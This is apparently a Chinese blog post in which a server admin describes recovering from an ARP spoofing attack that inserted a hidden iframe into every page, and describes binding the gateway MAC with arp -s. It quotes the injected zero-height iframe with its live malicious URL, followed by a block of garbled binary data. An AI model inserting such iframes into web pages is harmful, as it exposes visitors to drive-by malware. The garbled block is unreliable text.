惊心动魄修复ARP攻击

美好的夜晚,就在某人发来“晚安~”之后被ARP攻击毁掉了…
20:07:32,blue问我是不是对服务器进行操作了,页面显示不正常。
检查发现这样的状况:

<iframe src=http://f.ugt4d.cn/d1/13/index.htm width=100 height=0></iframe>‹������´VOo#5?©ßÁ5Rè2N²Ý²M2Alº‚E Tlpª<cÏŒµ{°=¤ˆÏÃXqZq¡’+Hœ¸pCâÎ… Ï3ùÛ¦¥ZÁ2cûýý½÷~ÎhÿäãÉô‹ÓÇ(s¹D§Ÿ>zúd‚p‡ÏîO9™ž Ïߟ~øõ‚.šª¬pB+*    yüF8s®RUUPÝ´IÉô2ó¶z^yñÙqšs ÷Z£Úã,—ʆ;ìôŽõF˜SæßN8ÉÇ’ÂÆåÅ>z—åB    æ6oY4ÑÊ
yPÅåˆ4 •sG‘÷Ñá_–â<Ä^+יΠŽQܬBìøÌïsˆâŒË]˜FÏë�¤PÏQfx œ¦ÜêÝÇ‘:*ˆ­ÅÈpbëæ’ÛŒs‡‘ õ�ñÆÈ2Q8$©JK0âè9}Voz¯”9°\&AA
Ä$†æÜ’«Ôeh?DÝ{諽Ö›2RÇÔ2—ùæÎp¯õõ^+)UìW)†Çî 4²1S    Åtµ’ /$y-Ð(H°=2Ëõ__#IŽ*Á\â£n£HÆMˆá3æR”1¡Ò?lÖ¶ q½öç’ZhˆÒÚP¾3[>nðxäØÒÏÃ.,‰c›{½îÆæõÓþ•µâÌÂs]NèQ.ÒÌ
»Å¬ö<n«ÈÃZÚ ²UˆBñˆ@Zj©k©ÍàÍž££a
×±â‚z‡Å¬YVyÀJ²!ÿüí«?üñë%@fÆ7zù— ®on¬S¼šÎ;}üŸîòŸh“#ÑL³ÚÂÔ(hôE­1¢uÆx1nA‘ï4£ιmÒB¥[ŒZ&ãjiÂ
†Ñ9•%|«~ÿ={~«xcv¥æo“†Á8ƒà+jÖN|kìÄ“J‘BÆW¹|ùÍå߃,“gë>¥ žô!ÿ´ÎwléÒµi^ =jµY˜ò„ó.kƒ70f0Æ|æµ€}¨IÄðYDöêǍßXŽ;ù‚çû?×áoT@ù+í1i`ªëv¶Þõâþ¼;Œ»Guc«_;\&!Öı¯-£\¸õD¥sZ­
úÓïè»—ž·GÄC>¾³7X×ß    Û©    œÚƒ{ÏÞ)•×€ãžØÆ?Ü›žºÖ×�>

P.S. 我之所以没有隐藏掉iframe里的src,完全是SEO需要,下一个中招的弟兄可以搜到这篇文章。我知道你年少轻狂,也别动去访问那一页的念头!

总之就是所有页面前面都被加了一个iframe,明显的ARP攻击症状。
搜索从来不删除邮件的Gmail,我发现上次ARP攻击之后,我们的真正网关的MAC被换过了…所以这也是我不想轻易执行arp -s绑定的原因:机房会换网关的,而一旦换了我们不知道,就回导致断网。
于是我只好不断执行arp命令查看当前的MAC,发现是错误的MAC,就执行以下命令清除ARP缓存:

[code=’sh’]arp -s 网关IP地址 网关真正的MAC地址[/code]

然而我悲壮地发现ARP缓存更新非常快,不到两分钟呢。我总不能一夜都手工干这个啊。于是我还是动了-s的念头。最终-s暂时躲过了这一劫,下面到了21点30分,例行宕机时间了…

关于 “惊心动魄修复ARP攻击” 的 2 个意见

  1. 一边看,还得一边wiki里面的缩写-.- 我太弱了..

发表评论